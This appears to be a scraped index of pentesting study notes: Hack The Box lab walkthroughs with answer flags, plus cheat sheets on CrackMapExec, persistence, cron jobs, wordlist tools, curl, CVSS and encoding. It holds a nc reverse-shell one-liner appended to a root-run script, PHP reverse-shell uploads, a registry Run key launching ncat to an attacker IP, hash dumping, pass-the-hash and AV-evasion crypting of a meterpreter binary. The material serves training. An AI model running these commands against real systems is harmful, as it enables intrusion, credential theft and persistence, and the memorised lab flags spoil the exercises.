                        Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

                        sudo nmap -sC -sV -p8080 $ip \n

                        Results: Apache Tomcat

                        Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

                        sudo nmap -sC -sV $ip\n

                        Results: 2323

                        List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

                        smbclient  /\\/\\10.129.125.178/\\users -U bob\n# password: Welcome1. Included in the path explanation\n\nsmb>dir\nsmb>cd flag\nsmb>get flag.txt\nsmb>quit\ncat flag.txt\n

                        Results: dceece590f3284c3866305eb2473d099

                        "},{"location":"cpts-labs/#web-enumeration","title":"Web Enumeration","text":"

                        Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

                        dirb http://94.237.55.246:55655/    \n# From enumeration you can get to dirb http://94.237.55.246:55655/robots.txt\n

                        Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php

                        Visit it and, hardcoded in the site you will see:

                                        <!-- TODO: remove test credentials admin:password123 -->\n

                        Login into the app.

                        Results: HTB{w3b_3num3r4710n_r3v34l5_53cr375}There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to:

                        "},{"location":"cpts-labs/#public-exploits","title":"Public Exploits","text":"

                        Access to the web app at http://ip:36883

                        The title of the wordpress post is \"Simple Backup Plugin 2.7.10\", which is a well-known vulnerable plugin.

                        searchsploit Simple Backup Plugin 2.7.10\n
                        ----------------------------------------------------------- ---------------------------------\n Exploit Title                                             |  Path\n----------------------------------------------------------- ---------------------------------\nSimple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt\n----------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n
                        sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .\nmv 51937.txt 51937.py\nchmod +x 51937.py\npython ./51937.py http://83.136.255.162:36883/ \"/flag.txt\" 4\n#  target_url = sys.argv[1]\n#  file_name = sys.argv[2]\n#  depth = int(sys.argv[3])\n

                        Results: HTB{my_f1r57_h4ck}

                        "},{"location":"cpts-labs/#privilege-escalation","title":"Privilege Escalation","text":"

                        SSH to $ip with user \"user1\" and password \"password1\". SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

                        ssh user1@$ip -p 31459\n# password1\n\nsudo -l\n# User user1 may run the following commands on\n#        ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:\n#    (user2 : user2) NOPASSWD: /bin/bash\n\n# One way: \necho #!/bin/bash > lala.sh\necho cat /home/user2/flag.txt >> lala.sh\nchmod +x lala.sh\nsudo -u user2  /bin/bash lala.sh\n\n# Another\nsudo -u user2 /bin/bash -i\n

                        Results: HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

                        Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

                        Once you are user2, go to /root:

                        cd /root\nls -la\n
                        drwxr-x--- 1 root user2 4096 Feb 12  2021 .\ndrwxr-xr-x 1 root root  4096 Jun  3 19:21 ..\n-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history\n-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc\n-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile\ndrwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh\n-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo\n-rw------- 1 root root    33 Feb 12  2021 flag.txt\n

                        So we have read access in .ssh folder. We can access and copy the private key

                        cd .ssh\ncat id_rsa\n
                        -----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n....\nQfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==\n-----END OPENSSH PRIVATE KEY-----\n

                        In our attacker machine we save that id_rsa key in our folder

                        echo \"the key\" > id_rsa\n

                        And now we can login as root

                        ssh root@$ip -p 31459 -i id_rsa\n

                        And cat the flag:

                        cat /root/flag.txt \n

                        Results: HTB{pr1v1l363_35c4l4710n_2_r007}

                        "},{"location":"cpts-labs/#nibbles-enumeration","title":"Nibbles - Enumeration","text":"

                        Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

                        sudo nmap -sC -sV $ip\n

                        Results: 2.4.18

                        "},{"location":"cpts-labs/#nibbles-initial-foothold","title":"# Nibbles - Initial Foothold","text":"

                        Gain a foothold on the target and submit the user.txt flag

                        Enumerate resources

                        ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip/nibbleblog/FUZZ -H \"HOST: $ip$\"\n\ndirb http://$ip/nibbleblog/\n

                        There are a lot of directory listing enabled. And eventually we can browser to: http://$ip/nibbleblog/content/private/users.xml

                        We can identify the user admin.

                        We could also enumerate http://$ip/nibbleblog/admin.php

                        Login access is admin:nibbles.

                        Go to Plugins tab and locate MyImage one: http://$ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

                        Upload a PHP reverse shell, go to http://$IP/nibbleblog/content/private/plugins/my_image/

                        Set a netcat listener

                        nc -lnvp 1234\n

                        Click on the reverse shell \"image.php\" and we will get a reverse shell.

                        whoami\n#nibbler\n\ncat /home/nibbler/user.txt\n

                        Results: 79c03865431abf47b90ef24b9695e14879c03865431abf47b90ef24b9695e148

                        "},{"location":"cpts-labs/#nibbles-privilege-escalation","title":"Nibbles - Privilege Escalation","text":"

                        Escalate privileges and submit the root.txt flag.

                        cd /home/nibbler\n
                        sudo -l\n

                        Results:

                        Matching Defaults entries for nibbler on Nibbles:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\n

                        The\u00a0nibbler\u00a0user can run the file\u00a0/home/nibbler/personal/stuff/monitor.sh\u00a0with root privileges. Being that we have full control over that file, if we append a reverse shell one-liner to the end of it and execute with\u00a0sudo\u00a0we should get a reverse shell back as the root user.

                        unzip personal.zip\nstrings /home/nibbler/personal/stuff/monitor.sh\n
                        echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPattacker 8443 >/tmp/f' | tee -a monitor.sh\n

                        In the attacker machine, open a new netcat:

                        nc -lnvp 8443\n

                        Run monitor.sh with sudo

                        sudo ./monitor.sh\n

                        In the new netcat connection you are root.

                        cat /root/root.txt\n

                        Results: de5e5d6619862a8aa5b9b212314e0cdd

                        Alternative way: Metasploit

                        exploit/multi/http/nibbleblog_file_upload\n
                        "},{"location":"cpts-labs/#knowledge-check","title":"Knowledge Check","text":"

                        Spawn the target, gain a foothold and submit the contents of the user.txt flag.

                        sudo nmap -sC -sV $ip\n

                        Go to http://$ip/robots.txt

                        Go to http://$ip/admin

                        Enter admin:admin

                        Go to Edit Theme: http://$ip/admin/theme-edit.php

                        Add a pentesmonkey shell and set a netcat listener on port 1234

                        Add gettingstarte.htb to your hosts file

                        Open the blog and you will get a reverse shell

                        cat /home/mrb3n/user.txt\n

                        Results: 7002d65b149b0a4d19132a66feed21d8

                        After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.

                        "},{"location":"crackmapexec/","title":"CrackMapExec","text":"

                        Once we have access to a domain, CrackMapExec (CME) will allow us to sweep the network and see which users and machines we can access to.

                        CME allows us to authenticate ourselves with the following protocols:

                        • smb
                        • ssh
                        • mssql
                        • ldap
                        • winrm

                        The most used protocol is smb as port 445 is commonly open.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#installation","title":"Installation","text":"
                        sudo apt-get -y install crackmapexec\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-usage","title":"Basic usage","text":"

                        Main syntax

                        crackmapexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>\n
                        # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated in the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#rce-with-crackmapexec","title":"RCE with crackmapexec:","text":"
                        #  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-technique","title":"Basic technique","text":"

                        Once we have access to a domain:

                        1. Enumerate users and machines in our machine: we will have all users registered and their hashes.

                        2. See if any user is in another machine of the domain. Also check if they have admin access.

                        3. Goal would be to dump ntds.dit.

                        With krbtgt and DC$ user you can get a golden ticket. And with DC$ a silver ticket.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#what-is-a-sam-hash-like","title":"What is a SAM hash like?","text":"

                        Take the Administrator one:

                        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n

                        Basically, it has 4 parts:

                                        user : id: LM-authentication : NTLM\n

                        For the purpose of using the hash with CrackMapExec, we will user the NTLM part.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"create-a-registry/","title":"Create a Registry","text":"

                        Registries in the victim machine may be used to save a connection to the attacker machine.

                        ","tags":["privilege escalation"]},{"location":"create-a-registry/#regedit","title":"Regedit","text":"
                        Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n\nRight-Button > New > String value\n\nWe name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>\n\nWe edit the registry and we add the path to the executable file and some commands\u00a0 in the Value data:\n\n\u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n\nFor instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
                        ","tags":["privilege escalation"]},{"location":"create-a-registry/#python-script-that-add-a-binary-to-the-registry","title":"Python script that add a binary to the Registry","text":"

                        See Making your binary persistent

                        ","tags":["privilege escalation"]},{"location":"cron-jobs/","title":"Cron jobs","text":"

                        In Linux, a common form of maintaining scheduled tasks is through Cron Jobs. The equivalent in Windows would be a Scheduled task. There are specific directories that we may be able to utilize to add new cron jobs if we have the write permissions over them:

                        1. /etc/crontab

                        2. /etc/cron.d

                        3. /var/spool/cron/crontabs/root

                        Basically, the principle behind this technique is:

                        • writing to a directory called by a cron job,
                        • and include a bash script with a reverse shell command,
                        • which should send us a reverse shell when executed.
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"crunch/","title":"crunch - A dictionary generator","text":"

                        Crunch generates combinations of words and manglings to be used later off as attacking dictionaries.

                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#installation","title":"Installation","text":"

                        Preinstalled in kali linux. To install:

                        sudo apt install crunch\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#basic-commands","title":"Basic commands","text":"
                        # Generates words from <number1> to <number2> with the specified characters.\ncrunch <number1> <number2> <characters> -o file.txt\n# <number1>: minimum of characters that password has\n# <number2>: maximum of characters that password has\n# <characters>: those characters included in the set\n# -o: Send output to file.txt\n# There exists more flags\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#resources","title":"Resources","text":"
                        • Advanced crunch: https://secf00tprint.github.io/blog/passwords/crunch/advanced/en.
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cryptography/","title":"Cryptography","text":"","tags":["crytography"]},{"location":"cryptography/#encryption-technologies","title":"Encryption Technologies","text":"Encryption Technology Description UNIX crypt(3) Crypt(3) is a traditional UNIX encryption system with a 56-bit key. Traditional DES-based DES-based encryption uses the Data Encryption Standard algorithm to encrypt data. bigcrypt Bigcrypt is an extension of traditional DES-based encryption. It uses a 128-bit key. BSDI extended DES-based BSDI extended DES-based encryption is an extension of the traditional DES-based encryption and uses a 168-bit key. FreeBSD MD5-based (Linux & Cisco) FreeBSD MD5-based encryption uses the MD5 algorithm to encrypt data with a 128-bit key. OpenBSD Blowfish-based OpenBSD Blowfish-based encryption uses the Blowfish algorithm to encrypt data with a 448-bit key. Kerberos/AFS Kerberos and AFS are authentication systems that use encryption to ensure secure entity communication. Windows LM Windows LM encryption uses the Data Encryption Standard algorithm to encrypt data with a 56-bit key. DES-based tripcodes DES-based tripcodes are used to authenticate users based on the Data Encryption Standard algorithm. SHA-crypt hashes SHA-crypt hashes are used to encrypt data with a 256-bit key and are available in newer versions of Fedora and Ubuntu. SHA-crypt and SUNMD5 hashes (Solaris) SHA-crypt and SUNMD5 hashes use the SHA-crypt and MD5 algorithms to encrypt data with a 256-bit key and are available in Solaris. ... and many more.","tags":["crytography"]},{"location":"cryptography/#symmetric-encryption","title":"Symmetric Encryption","text":"

                        There is only a shared secret key

                        ","tags":["crytography"]},{"location":"cryptography/#asymmetric-pki-encryption","title":"Asymmetric PKI Encryption","text":"

                        There is a public and a private key.

                        ","tags":["crytography"]},{"location":"cryptography/#digital-certificate","title":"Digital certificate","text":"

                        A digital certificate is an electronic document used to identify an individual, a sercer, an organization, or some other entity and associate that entity with a public key.

                        Digital certificates are used in PKI public key infraestructure encryption. We can thing of a digital certificate as our \"online\" digital credential that verifies our identity.

                        Digital certificates are issued by Certificate Authorities (CA).

                        ","tags":["crytography"]},{"location":"cryptography/#emails","title":"Emails","text":"

                        Symmetric and asymmetric encryption don't guarantee Integrity, Authentication or Non-Repudiation. They only guarantee Confidentiality.

                        To achieve Integrity, Authentication and Non-Repudiation, emails use a digital signature.

                        ","tags":["crytography"]},{"location":"cryptography/#windows-encrypted-file-system","title":"Windows Encrypted File System","text":"

                        Windows Encrypted File System (EFS) allows us to encrypt individual files and folders. Bit Locker, on the other hand, is full disk encryption.

                        Windows encryption uses a combination of symmetric and asymmetric encryption whereas:

                        • A separate symmetric secret key is created for each file.
                        • A digital certificate is created for the user, which holds the user's private and public pair.

                        If the user's digital certificate is deleted or lost, encrypted files and folders can only be decrypted with a Windows Recovery Agent.

                        Let's how it's decrypted:

                        Software based encryption: uses software tools to encrypt data: bitlocker, windows EFS, Veracrypt, 7zip.

                        ","tags":["crytography"]},{"location":"cryptography/#cipher-block-chaining-cbc","title":"Cipher block chaining (CBC)","text":"

                        Source: wikipedia

                        ","tags":["crytography"]},{"location":"ctr/","title":"ctr.sh","text":"

                        It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality.

                        ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"ctr/#usage","title":"Usage","text":"

                        In your browser, go to:

                        https://crt.sh/

                        ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"cupp-common-user-password-profiler/","title":"CUPP - Common User Password Profiler","text":"

                        This Common User Password Profiler tool (CUPP) generates a dictionary based on the input that you introduce when asked for names, dates, places...

                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#installation","title":"Installation","text":"

                        Github repo: https://github.com/Mebus/cupp.

                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#basic-commands","title":"Basic commands","text":"
                        python cupp.py <flag options>\n#    -i      Interactive questions for user password profiling\n#    -w      Use this option to profile existing dictionary, or WyD.pl output to make some pwnsauce :)\n#    -l      Download huge wordlists from repository\n#    -a      Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.\n#    -v      Version of the program\n
                        ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"curl/","title":"curl","text":"","tags":["bash","tools","pentesting"]},{"location":"curl/#basic-usage","title":"Basic usage","text":"
                        curl -i -L $host -v\n# -L: Follow redirections\n# -i: Include headers in the response \n# -v: verbose\n\ncurl -T file.txt\n# -T, --upload-file <file>; This transfers the specified local file to the remote URL. -T uses PUT http method\n\ncurl -o target/path/filename URL\n# -o: to specify a location/filename\n\n# Upload a File\ncurl -F \"Filedata=@./shellsample.php\" URL\n\n# Sends a GET request\ncurl -X GET $ip\n\n# Sends a HEAD request\ncurl -l  $ip\n\n# Sends a OPTIONS request\ncurl -X OPTIONS  $ip\n\n# Sends a POST request with parameters name and password in the body data\ncurl -X POST  $ip -d \"name=username&password=password\" -v\n\n# Upload a file with a PUT method\ncurl $ip/uploads/ --upload-file hello.txt\n\ncurl -XDELETE $ip/uploads/hello.txt\n# Delete a file\n
                        ","tags":["bash","tools","pentesting"]},{"location":"cve-common-vulnerabilities-and-exposures/","title":"cve","text":"

                        Common Vulnerabilities and Exposures (CVE) is a publicly available catalog of security issues sponsored by the United States Department of Homeland Security (DHS).

                        Each security issue has a unique CVE ID number assigned by the CVE Numbering Authority (CNA). The purpose of creating a unique CVE ID number is to create a standardization for a vulnerability or exposure as a researcher identifies it.

                        "},{"location":"cve-common-vulnerabilities-and-exposures/#stages-of-obtaining-a-cve","title":"Stages of Obtaining a CVE","text":"

                        Stage 1: Identify if CVE is Required and Relevant.

                        Stage 2: Reach Out to Affected Product Vendor.

                        Stage 3: Identify if Request Should Be For Vendor CNA or Third Party CNA.

                        Stage 4: Requesting CVE ID Through CVE Web Form.

                        Stage 5: Confirmation of CVE Form.

                        Stage 6: Receival of CVE ID.

                        Stage 7: Public Disclosure of CVE ID.

                        Stage 8: Announcing the CVE.

                        Stage 9: Providing Information to The CVE Team.

                        If an issue is not responsibly disclosed to a vendor, real threat actors may be able to leverage the issues for criminal use, also referred to as a zero day or an 0-day.

                        "},{"location":"cvss-common-vulnerability-scoring-system/","title":"Common Vulnerability Scoring System","text":"

                        Source: Hack The Box Academy

                        The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of software vulnerabilities in an objective way. For that it uses standarized vendor and platform agnostic vulnerability scoring methodologies.

                        Scores ranges from 0.0 to 10.0 (being the most severe):

                        • Low: 0.1-3.9.
                        • Medium: 4.0-6.9
                        • High: 7.0-8.9
                        • Critical: 9.0-10.00

                        CVSS uses a combination of base, temporal, and environmental metrics

                        CVSS is not a risk rating framework (for that you have OWASP, for instance); typical out of scope impact: number of customer on a product line, monetary losses due to a breach, ....

                        There are three basic vectors: Basic metric group, temporal metric group and Environmental metric group.

                        The way to quote a CVSS scoring is adding also their vector.

                        ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#metric-groups","title":"Metric groups","text":"

                        Base score reflects the severity of a vulnerability according to ist intrinsic characteristic which are constant over time and assumes the reasonable worst case impact across different deployed environments:

                        • Exploitability metrics: The Exploitability metrics are a way to evaluate the technical means needed to exploit the issue.

                          • Attack vector (AV):

                            • Network (N attack where there is rooter in place),
                            • Adjacent (A attack is launched from the same network segment, VPN included),
                            • Local (L attacker can login locally into the system),
                            • Physical (P the attacker needs to be physically present).
                          • Attack Complexity (AC): Conditions that should be present in order for the attack to exists.

                            • Low (L): there is not specialized access conditions to perform the attack.
                            • High (H): attacker should invest or prepare somehow before an attack (for instance, gathering knowledge about configurations or setup software or licenses)
                          • Privileged Required (PR):

                            • None (N): The attacker is unauthorize prior to attack
                            • Low (L): Attacker should have user level access.
                            • High (H): Privileges that provide significant control over the vulnerable component.
                          • User Interaction (UI): Need user participation.

                            • None (N): Attack can be perform without any action from user side.
                            • Required (R): Somebody has to visit the page and click it.
                        • Scope: what component is impacted by the vulnerability. Whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. If the scope is C, then IMPACT needs to be revaluated.

                          • Changed (C): the exploited vulnerability affects resources managed by different security authority.
                          • Unchanged (U): the exploited vulnerability can only affect resources managed by the same security authority.
                        • Impact metrics: CIA. The Impact metrics represent the repercussions of successfully exploiting an issue and what is impacted in an environment, and it is based on the CIA triad.

                          • Confidentiality (C): Impact to the confidentiality if the information resources are accessed.

                            • None (N): None data revealed.
                            • Low (L): Some data is accessed. But it has not impact.
                            • High (H): Total loss of confidentiality. Access to restricted information is obtained, and disclosed information is critical.
                          • Integrity (I):

                            • None (N):
                            • Low (L):
                            • High (H):
                          • Availability (A):

                            • None (N):
                            • Low (L):
                            • High (H):

                        Temporal metric group: the characteristics of a vulnerability that may change over time but not across user environments.

                        • Exploit Code Maturity (E) metric represents the probability of an issue being exploited based on ease of exploitation techniques.

                          • Not Defined
                          • High
                          • Functional
                          • Proof-of-Concept
                          • Unproven.
                        • Remediation Level (RL) is used to identify the prioritization of a vulnerability.

                          • Not Defined
                          • Unavailable
                          • Workaround
                          • Temporary Fix
                          • Official Fix
                        • Report Confidence (RC) represents the validation of the vulnerability and how accurate the technical details of the issue are.

                          • Not Defined
                          • Confirmed
                          • Reasonable
                          • Unknown

                        Environmet metric group: the characteristics of a vulneravbility that are relevant and unique to a particular user's environment.

                        • Env (CR, IA, ...)

                        All metrics are scored under the assumption that the attacker has already located and identified the vulnerability. Analyst need to consider the means by which the vulnerability was identified or difficulty to identify the vulnerability.

                        ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#cvss-calculator","title":"cvss Calculator","text":"

                        nist calculator

                        ","tags":["cvss"]},{"location":"darkarmour/","title":"darkarmour","text":"

                        Store and execute an encrypted windows binary from inside memory, without a single bit touching disk: generate an undetectable version of a pe executable.

                        ","tags":["payloads","tools"]},{"location":"darkarmour/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/bats3c/darkarmour.

                        It uses the python stdlib so no need to worry about any python dependencies, so the only issue you could come accoss are binary dependencies. The required binarys are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probly osslsigncode soon as well). These can all be installed via apt.

                        sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode\n
                        ","tags":["payloads","tools"]},{"location":"darkarmour/#basic-usage","title":"Basic usage","text":"
                        ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5\n\n\n# -f: file to crypt, assumed as binary if not told otherwise\n# -e: encryption algorithm to use (xor)\n# -S: SHELLCODE file contating the shellcode, needs to be in the 'msfvenom -f raw' style format \n# -b: provide if file is a binary exe\n# -d, --dll: use reflective dll injection to execute the binary inside another process\n# -s: provide if the file is c source code\n# -k: key to encrypt with, randomly generated if not supplied\n# -l LOOP, --loop: LOOP  number of levels of encryption\n# -o: name of outfile, if not provided then random filenameis assigned\n
                        ","tags":["payloads","tools"]},{"location":"data-encoding/","title":"Data encoding","text":"Resources
                        • All ASCII codes
                        • All UTF-8 enconding table and Unicode characters
                        • Charset converter
                        • HTML\u00a0URL Encoding\u00a0Reference

                        Encoding ensures that data like text, images, files and multimedia can be effectively communicated and displayed through web technologies and typically involves converting data from its original form into a format that is suitable for digital transmission and storage while preserving its meaning and integrity. Encoding plays a crucial role in discovering and understanding how a web application handles different types of input, especially when those inputs contain special characters, binary data, or unexpected sequences.

                        Encoding is an essential aspect of web application penetration testing, particularly when dealing with input validation, data transmission, and various attack vectors. It involves manipulating data or converting it into a different format, often to bypass security measures, discover vulnerabilities, or execute attacks.

                        "},{"location":"data-encoding/#basic-concepts","title":"Basic concepts","text":"

                        A \"charset,\" short for character set, is a collection of characters, symbols, and glyphs that are associated with unique numeric codes or code points. Character sets define how textual data is mapped to binary values in computing systems. Examples of charsets are: ASCII, Unicode, Latin-1 etc.

                        Character encoding is the representation in bytes of the symbols of a charset.

                        "},{"location":"data-encoding/#ascii-encoding","title":"ASCII encoding","text":"

                        URLs are permitted to contain only the printable characters in the US-ASCII character set: those in the range 0x20-0x7e inclusive. The URL-encoded form of any character is the % prefix followed by the character's two digit ASCII code expresed in hexadecimal.

                        ASCII stands for \"American Standard Code for Information Interchange.\" It's a widely used character encoding standard containing 128 characters that was developed in the 1960s to represent text and control characters in computers and communication equipment. ASCII defines a set of codes to represent letters, numbers, punctuation, and control characters used in the English language and basic communication. It primarily covers English characters, numbers, punctuation, and control characters, using 7 or 8 bits to represent each character. ASCII cannot be used to display symbols from other languages like Chinese.

                        All ASCII codes

                        %3d = %25 % %20 space %00 null byte %0a new line %27 ' %22 \" %2e . %2f / %28 ( %29 ) %5e ^ %3f ? %3c < %3e > %3b ; %23 # %2d - %2a * %3a : %5c| \\ %5b [ %5d ]

                        Characteristics:

                        • Character Set: ASCII includes a total of 128 characters, each represented by a unique 7-bit binary code. These characters include uppercase and lowercase letters, digits, punctuation marks, and some control characters.
                        • 7-Bit Encoding: In ASCII, each character is encoded using 7 bits, allowing for a total of 2^7 (128) possible characters. The most significant bit is often used for parity checking in older systems.
                        • Standardization: ASCII was established as a standard by the American National Standards Institute (ANSI) in 1963 and later became an international standard.
                        • Basic Character Set:

                          • Uppercase letters: A-Z (65-90)
                          • Lowercase letters: a-z (97-122)
                          • Digits: 0-9 (48-57)
                          • Punctuation: Various symbols such as !, @, #, $, %, etc.
                          • Control characters: Characters like newline, tab, carriage return, etc.
                        • Compatibility: ASCII is a subset of many other character encodings, including more comprehensive standards like Unicode. The first 128 characters of the Unicode standard correspond to the ASCII characters.

                        • Limitations: ASCII is primarily designed for English text and doesn't support characters from other languages or special symbols.
                        "},{"location":"data-encoding/#unicode-encoding","title":"Unicode encoding","text":"

                        Unicode is a character set standard that aims to encompass characters from all writing systems and languages used worldwide. Unlike early encoding standards like ASCII, which were limited to a small set of characters, Unicode provides a unified system for representing a vast range of characters, symbols, and glyphs in a consistent manner. It enables computers to handle text and characters from diverse languages and scripts, making it essential for internationalization and multilingual communication.

                        \"UTF\" stands for \"Unicode Transformation Format.\" It refers to different character encoding schemes within the Unicode standard that are used to represent Unicode characters as binary data. Unicode has three main character encoding schemes: UTF-8, UTF-16 and UTF-32. The trailing number indicates the number of bits to represent code points.

                        All UTF-8 enconding table and Unicode characters

                        "},{"location":"data-encoding/#utf-8-unicode-transformation-format-8-bit","title":"UTF-8 (Unicode Transformation Format 8-bit)","text":"

                        UTF-8 is a variable-length character encoding scheme. It uses 8-bit units (bytes) to represent characters. ASCII characters are represented using a single byte (backward compatibility).

                        Non-ASCII characters are represented using multiple bytes, with the number of bytes varying based on the character's code point.

                        UTF-8 is widely used on the web and in many applications due to its efficiency and compatibility with ASCII.

                        "},{"location":"data-encoding/#utf-16-unicode-transformation-format-16-bit","title":"UTF-16 (Unicode Transformation Format 16-bit)","text":"

                        UTF-16 is a variable-length character encoding scheme. It uses 16-bit units (two bytes) to represent characters. Characters with code points below 65536 (BMP - Basic Multilingual Plane) are represented using two bytes.

                        Characters with higher code points (outside the BMP) are represented using four bytes (surrogate pairs).

                        UTF-16 is commonly used in programming languages like Java and Windows systems.

                        "},{"location":"data-encoding/#html-encoding","title":"HTML encoding","text":"

                        HTML encoding, also known as HTML entity encoding, involves converting special characters and reserved symbols into their corresponding HTML entities to ensure that they are displayed correctly in web browsers and avoid any unintended interpretation as HTML code.

                        HTML encoding is crucial for maintaining the integrity of web content and preventing issues such as cross-site scripting (XSS) attacks. HTML entities are sequences of characters that represent special characters, symbols, and reserved characters in HTML.

                        They start with an ampersand (&) and end with a semicolon (;). When the browser encounters an entity in an HTML page it will show the symbol to the user and will not interpret the symbol as an HTML language element.

                        &lt; < (less than sign) &gt; > (greater than sign) &amp; & (ampersand) &quot; \" (double quotation mark) &apos; ' (apostrophe) &nbsp; non-breaking space &mdash; em dash (\u2014) &copy; copyright symbol (\u00a9) &reg; registered trademark symbol (\u00ae) &hellip; ellipsis (...)

                        In addition, any character can be HTML encoded using its ASCII code in decimal form:

                        &#34; \" &#39; '

                        or by using its ASCII code in hexadecimal form (prefixed by an X):

                        &#x22; \" &#x27; '"},{"location":"data-encoding/#url-encoding","title":"URL Encoding","text":"

                        HTML\u00a0URL Encoding\u00a0Reference

                        URL encoding, also known as percent-encoding, is a process used to encode special characters, reserved characters, and non-ASCII characters into a format that is safe for transmission within URLs (Uniform Resource Locators) and URI (Uniform Resource Identifiers).

                        URL encoding replaces unsafe characters with a \"%\" sign followed by two hexadecimal digits that represent the ASCII code of the character. This allows URLs to be properly interpreted by web browsers and other network components. URLs sent over the Internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are present in a URL, encoding them is required.

                        This encoding is important because it limits the characters to be used in a URL to a subset of specific characters:

